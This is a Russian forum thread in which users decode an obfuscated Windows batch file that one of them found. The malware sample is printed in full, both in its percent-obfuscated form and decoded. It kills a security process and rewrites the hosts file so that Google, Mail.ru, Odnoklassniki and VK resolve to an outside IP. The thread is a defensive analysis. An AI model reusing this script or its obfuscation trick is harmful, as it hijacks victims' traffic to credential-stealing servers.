Гость
Целевая тема:
Создать новую тему:
Автор:
Форумы / Windows [игнор отключен] [закрыт для гостей] / Что это за ахинея? / 7 сообщений из 7, страница 1 из 1
16.02.2013, 18:48
    #38154081
Александр Онищук
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
Обнаружил батник странного содержания.
Как можно такое расшифровать?

Код: sql
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
%gkjjh%c%ciitu%h%raeka%c%potipav%p%faieu% %puoany%8%ueuauip%6%nejjo%6
%detvzwln%(%bojam%t%ygfoiuns%a%uahtumo%s%fnwify%k%snecdri%k%mzalolt%i%bxedc%l%onbigiur%l%ksfmqje% %svxtks%/%bxlqkyrxe%f%jvxteqj% %nhbeyxl%/%khtao%i%kykqet%m%mmynkx% %tiilfgiqf%"%ufmroo%p%dayrilk%r%heela%a%ymycd%e%iapbfta%t%qjcnyey%o%ejzzjayru%r%wjagikbzf%i%ygipqtew%a%hoocii%n%dypptajvh%.%oyniedyh%e%nesuejw%x%vtiuo%e%ffoeee%"%kyhjl%)
%zuyoq%S%swfmbrk%E%fgrrqa%T%ayieiq% ywusckab=%iuyazrpl%9%xypunbj%1%avlkhj%.%vikehrmea%2%uawhap%0%fnelu%8%nnmva%.%meduuusru%1%svovr%6%gziyfuoy%.%kxvskemrj%2%sjjovxoq%5%ozuoo%3
%ixrhk%S%pwyou%E%ynzzzb%T%ujvzd% nqjoqpvua=%lzuwp%\%djiimp%s%rhapyid%y%sftifroa%s%owyldsby%t%obxoneh%e%rylhprkbu%m%hfwoau%3%exkzcu%2%iexvds%\%czdueruig%d%ejcts%r%yhnbp%i%rlyxiahqr%v%axzan%e%dorpceo%r%uyvbf%s%lqyfozhi%\%ehtjhqtyc%e%ngpeg%t%jwdjlwo%c%cvutshaqi%\%qibvp%h%jdbeelmya%o%izxwru%s%aewbxijyu%t%nitiji%s
%vnhjqztel%S%rsazjijy%E%rnalvadj%T%bepkg% eolaukyz=%SystemRoot%
%paitdhrah%S%dkfkdvzm%E%rycrb%T%hdvevmidy% qhwsad=%zkyipeckz%%eolaukyz%%oeaaoam%%nqjoqpvua%
%uqtocmzrh%e%xuaifxmm%c%eicypxvow%h%iyuryum%o%vuito% %siuvymhdk%1%njyiizg%2%xobne%7%rsflgfdx%.%alnvfizn%0%mguhlmae%.%tcnybgvr%0%wavovyx%.%ubueych%1%vewwy% %syuepuu%l%gughqtkr%o%fkfidko%c%lvwawzrah%a%jstkqga%l%iooko%h%gwczvwsky%o%slkvd%s%azlvonfea%t%khnvu% %qpgws%>%lwyviqe% %qhwsad%
%joaaurxk%e%jfvzpsk%c%fboicguxp%h%aronhflo%o%ugxgpkj% %eaarca%1%oydolh%2%npopifx%7%hsobh%.%waooxivxu%0%xrajyyo%.%cblnuap%0%mydvuyyo%.%upzwxk%1%irsstiiw% %ubkxufupp%l%onogjyiq%o%iaqyauwc%c%ebuyfm%a%ieksd%l%pypaeuxoe%h%jwhilqgo%o%uvfnlyuby%s%hscgecdz%t%pecnvhjxo% %hduqyhee%>%jdquea% %SystemRoot%\%cynrtfl%s%esjfafau%y%eavex%s%rysekj%t%dfodeyoq%e%ncggiocz%m%uzoypwima%3%yuuewjx%2%aakoi%\%xilbwhug%d%paiwowrdx%r%oealya%i%dvzav%v%conhov%e%abmuc%r%ucrme%s%nlnyucis%\%okqzalou%e%zeina%t%gyveuir%c%okvvli%\%cnatrxbty%h%yybcyda%®%crolzgsh%s%jbuzeg%t%kfokyfip%s
::yvrxqtkdmieuaspkgdayeekyvonoc
e%gyewqy%c%gdtcuu%h%yecgc%o%xuoolaze% %ywusckab% w%xihtjw%w%yukpaq%w%lajaiu%.%bkvvvaa%g%lkckhor%o%crziw%o%xcicw%g%iazevt%l%shxgawrgo%e%jegxisdb%.%pcdeqjjer%c%aivupu%o%bpote%m%lruxtfyq%.%fepsum%u%guoakvo%a >> %qhwsad%
::aouwhhhspisjewlywoecu
e%giuffg%c%uqwrde%h%ozzom%o%tukcaiehs% %ywusckab% g%zgrejjugi%o%exciy%o%yzyhecakd%g%ymbebbwo%l%cuuuqzv%e%aonxbcab%.%qeaagau%r%szofxyeo%u >> %qhwsad%
::xyuafvmuyidovacziaen
e%kyobwwb%c%ygseoceir%h%aoaedbx%o%bojbc% %ywusckab% w%ufwgeweeq%w%igqmjx%w%vnuykydd%.%xcvedwd%o%uxzgu%d%caautitpb%n%feujelea%o%ngyjxw%k%nanhgw%l%zuupjpd%a%ugaieuo%s%uyymywgnr%s%aonhakqvv%n%uuiolcku%i%yvmywukx%k%ofiaau%i%qbfeyejiy%.%pngezoiga%r%niyaaoa%u >> %qhwsad%
e%masmy%c%juarrya%h%puimooai%o%oqmatu% %ywusckab% m%awfuyh%y%dcinscdem%.%euhda%m%yduyu%a%lrgfp%i%kojvblyhi%l%ggrysmi%.%iefioj%r%yoxui%u >> %qhwsad%
::oewfilhypfikiukjxeirdbzeajwpo
::ohhtiykbleeqpqfklyihufa
e%ybebrnybi%c%uiiaoy%h%vlilqci%o%gqxcsvtv% %ywusckab% a%irhcf%2%uaiyi%.%yuoezfm%u%dsaoa%s%meolxl%e%quuecane%r%vzool%d%gkaic%a%danui%i%naiyhqizp%l%omjqsey%.%ipylo%r%mzwspp%u >> %qhwsad%
::uufxeyppyjeatpnoiapyy
::vonierxvdaadpbpzeibnmlm
::veyupaleoxtqquiafribb
::vuzymuojzqkslnovqqfncmysjux
::ymtyqtdxoxmjfvajflpd
::ugzpxsjmuhnaaonyadkjgexnio
::wpcgkwswfzwerdredazgzuoiz
::aurvkgtigguoygedtaruyyel
::zodxsemjyijhyrtkgehjawo
e%oynuk%c%nwhfjry%h%ygaan%o%elkoku% %ywusckab% m%uodkr%.%aojsebnf%o%eaeac%d%mhikg%n%eovzi%o%waaimoqcd%k%qouxduv%l%ilomoenq%a%vxuvyl%s%kiaioy%s%bmjytutia%n%yuaatin%i%lnwef%k%cskbrwaqv%i%mkcxb%.%eotiihzzf%r%uablw%u >> %qhwsad%
::opnfrleubmpafhyavvntdleyfd
e%xkijhoehy%c%zzlaeui%h%nqyizrls%o%xyqii% %ywusckab% e%vojrmy%.%bfyuyyp%m%zbhxi%a%gkxxouarg%i%rxgtu%l%yiskgmeyb%.%yuuymdnum%r%jijuo%u >> %qhwsad%
::crouaglheeyiehnzeouaa
::uyacoptxcsakelufuxuuu
::gljikdyaqujjaasnpmkdalal
::aegydaiwbvekjsizzfcjqacuoitlu
::wdqmovxupbpyynaiuwoow
::eiemuzijqrykizawtoguoajeify
::papahfulvyieqkkaobaiekarxrem
::zfvbhjvzhmkyaxcjyiirsjqmef
::igzqsqtiipzqsbldfamgoo
e%moeomoa%c%tlirsyheh%h%fqdyozg%o%owjktsz% %ywusckab% m%ilzhv%a%juycyfi%i%jhxyege%l%slggsde%.%eoyre%r%qujezcy%u >> %qhwsad%
::jwosmlpboioxxmgulugv
e%ohzgitula%c%lxrjw%h%bnusndkaq%o%ehsdu% %ywusckab% o%hbgok%d%veegouds%n%qjinm%o%yyafudw%k%isucly%l%oosvjh%a%lvpio%s%jcvuhfapi%s%doiedkh%n%mlxaaxolr%i%mmhiewcuu%k%rjborhdri%i%mtavhy%.%zabwadjp%r%irwkebg%u >> %qhwsad%
e%aazfwezok%c%jluuykynk%h%evayfyy%o%aupvga% %ywusckab% g%wohay%o%myhekffwo%o%bkrbqo%g%eahly%l%bkgedu%e%jovpcer%.%eaiqpyls%c%ormfreea%o%iofmor%m >> %qhwsad%
::gfxpeyxfwniyuhoymycqwcaetogz
e%gjotmakt%c%aazuoq%h%qnyif%o%isyyixon% %ywusckab% w%jxkjcyuv%w%dqmcyal%w%oampuw%.%oakmktu%g%byiefek%o%usfuxe%o%amdym%g%jyowxc%l%iukna%e%beqwargu%.%tjsliojjr%c%jieraak%o%aoqomafm%m >> %qhwsad%
::haeoflcxqoxoymdayoyjpnhyugb
e%atbib%c%exlyhu%h%wxfxumlv%o%nmumnyooo% %ywusckab% b%cngra%7%idjby%.%ofhnswzh%u%yhgchau%s%juaamvm%e%ujhaoygo%r%suhcc%d%hgqhbjo%a%yozftydaq%i%ieqczu%l%zykpm%.%xmmaaejsa%r%voldevo%u >> %qhwsad%
::jadesefkvrqkfbehnxueytufwz
e%ooqqzbvrs%c%sjupiuh%h%icboo%o%uxato% %ywusckab% w%juvra%w%qroom%w%yvooysd%.%hlcgovpek%e%aaoxha%.%mqopyu%m%hxgiomuux%a%jeawlo%i%tjxav%l%lxzrsojkd%.%ftofxiijf%r%yamznme%u >> %qhwsad%
e%xcdqtafoi%c%kavyobw%h%pjzfuj%o%bmgqoey% %ywusckab% c%zdcoytgeo%7%inmyeolv%.%qbnnx%u%armbeqw%s%easrrq%e%uexacoanh%r%xlseyf%d%miamyd%a%oqhni%i%kuevua%l%elmbeydbn%.%rilqur%r%oraej%u >> %qhwsad%
::oaaxhufjdoyvelydnomhg
e%iznofaz%c%gzrkypd%h%pjithi%o%diivd% %ywusckab% m%qvzixyb%.%coiatadxs%v%bfylmoen%k%piitmhy%.%eahaci%c%zifuan%o%rrniyei%m >> %qhwsad%
::quikxotjzbtfsajahokcpa
::heksmpiaopolaooagaigginad
e%olqeovfw%c%ulcagmo%h%kenhumrm%o%xoaiyq% %ywusckab% v%lglfiy%k%ullujusji%.%cxqomtad%c%ztjmreu%o%vhjaut%m >> %qhwsad%
e%ygvova%c%drjeyoedz%h%ofooedymx%o%algepghba% %ywusckab% g%lnuuzaaq%o%nehpuvi%o%zcniniw%g%ypqat%l%oprhug%e%idipkfzr%.%uuysyjz%c%munezn%o%hmduaqfnf%m%opojndej%.%wvtpgon%u%sikyaey%a >> %qhwsad%
::bcygyugnepherdlipuqietkcnfg
e%ebuouon%c%ltyuiepxw%h%iajcgu%o%faxoasuhj% %ywusckab% w%ahgdtfs%w%auuqt%w%oamfalid%.%tsoztl%g%jzdeivi%o%eansp%o%repiyuh%g%zbvayi%l%iukefzpay%e%yeeuyywj%.%qtootgxom%r%gvxrr%u >> %qhwsad%
::gizazrfonriadweqsjzllnisoeae
::jacoieeedabfuewtsducriu
::isyaeeeowryfywtjbwvfi
::tezyoroyatslhejfhivdechyiim
::eloyppreqyxejfveapailephfxi
...
Рейтинг: 0 / 0
16.02.2013, 19:21
    #38154106
Dimitry Sibiryakov
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
Александр ОнищукКак можно такое расшифровать?

Легко. Убери всё между знаками процента. Включая сами знаки.
Posted via ActualForum NNTP Server 1.5
...
Рейтинг: 0 / 0
16.02.2013, 19:29
    #38154114
miksoft
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
Dimitry SibiryakovАлександр ОнищукКак можно такое расшифровать?

Легко. Убери всё между знаками процента. Включая сами знаки.хм, действительно.
Первая строка получается chcp 866
...
Рейтинг: 0 / 0
16.02.2013, 22:08
    #38154204
Александр Онищук
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
И все равно ничего не понятно!
B успел уже почистить временный каталог: C:\Windows\Temp
дешифрованный батник
Код: powershell
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
chcp 866
(taskkill /f /im "praetorian.exe") SET ywusckab=91.208.16.253
SET nqjoqpvua=\system32\drivers\etc\hosts
SET eolaukyz=%SystemRoot%

SET qhwsad=%zkyipeckz%%eolaukyz%%oeaaoam%%nqjoqpvua%

echo 127.0.0.1 localhost > %qhwsad%
echo 127.0.0.1 localhost > %SystemRoot%\system32\drivers\etc\hosts
::yvrxqtkdmieuaspkgdayeekyvonoc
echo www.google.com.ua >> %qhwsad%
::aouwhhhspisjewlywoecu
echo www.google.ru >> %qhwsad%
::xyuafvmuyidovacziaen
echo www.odnoklassniki.ru >> %qhwsad%
echo my.mail.ru >> %qhwsad%
::oewfilhypfikiukjxeirdbzeajwpo
::ohhtiykbleeqpqfklyihufa
echo a2.userdail.ru >> %qhwsad%
::uufxeyppyjeatpnoiapyy
::vonierxvdaadpbpzeibnmlm
::veyupaleoxtqquiafribb
::vuzymuojzqkslnovqqfncmysjux
::ymtyqtdxoxmjfvajflpd
::ugzpxsjmuhnaaonyadkjgexnio
::wpcgkwswfzwerdredazgzuoiz
::aurvkgtigguoygedtaruyyel
::zodxsemjyijhyrtkgehjawo
echo m.odnoklassniki.ru >> %qhwsad%
::opnfrleubmpafhyavvntdleyfd
echo e.mail.ru >> %qhwsad%
::crouaglheeyiehnzeouaa
::uyacoptxcsakelufuxuuu
::gljikdyaqujjaasnpmkdalal
::aegydaiwbvekjsizzfcjqacuoitlu
::wdqmovxupbpyynaiuwoow
::eiemuzijqrykizawtoguoajeify
::papahfulvyieqkkaobaiekarxrem
::zfvbhjvzhmkyaxcjyiirsjqmef
::igzqsqtiipzqsbldfamgoo
echo mail.ru >> %qhwsad%
::jwosmlpboioxxmgulugv
echo odnoklassniki.ru >> %qhwsad%
echo www.google.com >> %qhwsad%
::gfxpeyxfwniyuhoymycqwcaetogz
echo www.google.com >> %qhwsad%
::haeoflcxqoxoymdayoyjpnhyugb
echo b7.userdail.ru >> %qhwsad%
::jadesefkvrqkfbehnxueytufwz
echo www.e.mail.ru >> %qhwsad%
echo c7.userdail.ru >> %qhwsad%
::oaaxhufjdoyvelydnomhg
echo m.vk.com >> %qhwsad%
::quikxotjzbtfsajahokcpa
::heksmpiaopolaooagaigginad
echo vk.com >> %qhwsad%
echo google.com.ua >> %qhwsad%
::bcygyugnepherdlipuqietkcnfg
echo www.google.ru >> %qhwsad%
::gizazrfonriadweqsjzllnisoeae
::jacoieeedabfuewtsducriu
::isyaeeeowryfywtjbwvfi
::tezyoroyatslhejfhivdechyiim
::eloyppreqyxejfveapailephfxi



...
Рейтинг: 0 / 0
16.02.2013, 22:09
    #38154205
Александр Онищук
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
Кстати в файле \system32\drivers\etc\hosts все чисто
...
Рейтинг: 0 / 0
16.02.2013, 22:46
    #38154225
AndreTM
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
Немного не так . Дешифрованный:
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
chcp 866
(taskkill /f /im "praetorian.exe")
SET ywusckab=91.208.16.253
SET nqjoqpvua=\system32\drivers\etc\hosts
SET eolaukyz=%SystemRoot%
SET qhwsad=%eolaukyz%%nqjoqpvua%
echo 127.0.0.1 localhost > %qhwsad%
echo 127.0.0.1 localhost > %SystemRoot%\system32\drivers\etc\h®sts
echo %ywusckab% www.google.com.ua >> %qhwsad%
echo %ywusckab% google.ru >> %qhwsad%
echo %ywusckab% www.odnoklassniki.ru >> %qhwsad%
echo %ywusckab% my.mail.ru >> %qhwsad%
echo %ywusckab% a2.userdail.ru >> %qhwsad%
echo %ywusckab% m.odnoklassniki.ru >> %qhwsad%
echo %ywusckab% e.mail.ru >> %qhwsad%
echo %ywusckab% mail.ru >> %qhwsad%
echo %ywusckab% odnoklassniki.ru >> %qhwsad%
echo %ywusckab% google.com >> %qhwsad%
echo %ywusckab% www.google.com >> %qhwsad%
echo %ywusckab% b7.userdail.ru >> %qhwsad%
echo %ywusckab% www.e.mail.ru >> %qhwsad%
echo %ywusckab% c7.userdail.ru >> %qhwsad%
echo %ywusckab% m.vk.com >> %qhwsad%
echo %ywusckab% vk.com >> %qhwsad%
echo %ywusckab% google.com.ua >> %qhwsad%
echo %ywusckab% www.google.ru >> %qhwsad%
А дальше - подставляем значения переменных из SET на их места
...
Рейтинг: 0 / 0
18.02.2013, 00:44
    #38155049
С0ВЕСТЬ
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Что это за ахинея?
AndreTMНемного не так . Дешифрованный:
Код: plaintext
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
chcp 866
(taskkill /f /im "praetorian.exe")
SET ywusckab=91.208.16.253
SET nqjoqpvua=\system32\drivers\etc\hosts
SET eolaukyz=%SystemRoot%
SET qhwsad=%eolaukyz%%nqjoqpvua%
echo 127.0.0.1 localhost > %qhwsad%
echo 127.0.0.1 localhost > %SystemRoot%\system32\drivers\etc\h®sts
echo %ywusckab% www.google.com.ua >> %qhwsad%
echo %ywusckab% google.ru >> %qhwsad%
echo %ywusckab% www.odnoklassniki.ru >> %qhwsad%
echo %ywusckab% my.mail.ru >> %qhwsad%
echo %ywusckab% a2.userdail.ru >> %qhwsad%
echo %ywusckab% m.odnoklassniki.ru >> %qhwsad%
echo %ywusckab% e.mail.ru >> %qhwsad%
echo %ywusckab% mail.ru >> %qhwsad%
echo %ywusckab% odnoklassniki.ru >> %qhwsad%
echo %ywusckab% google.com >> %qhwsad%
echo %ywusckab% www.google.com >> %qhwsad%
echo %ywusckab% b7.userdail.ru >> %qhwsad%
echo %ywusckab% www.e.mail.ru >> %qhwsad%
echo %ywusckab% c7.userdail.ru >> %qhwsad%
echo %ywusckab% m.vk.com >> %qhwsad%
echo %ywusckab% vk.com >> %qhwsad%
echo %ywusckab% google.com.ua >> %qhwsad%
echo %ywusckab% www.google.ru >> %qhwsad%
А дальше - подставляем значения переменных из SET на их места
Какой-то тупой вирус
...
Рейтинг: 0 / 0
Форумы / Windows [игнор отключен] [закрыт для гостей] / Что это за ахинея? / 7 сообщений из 7, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]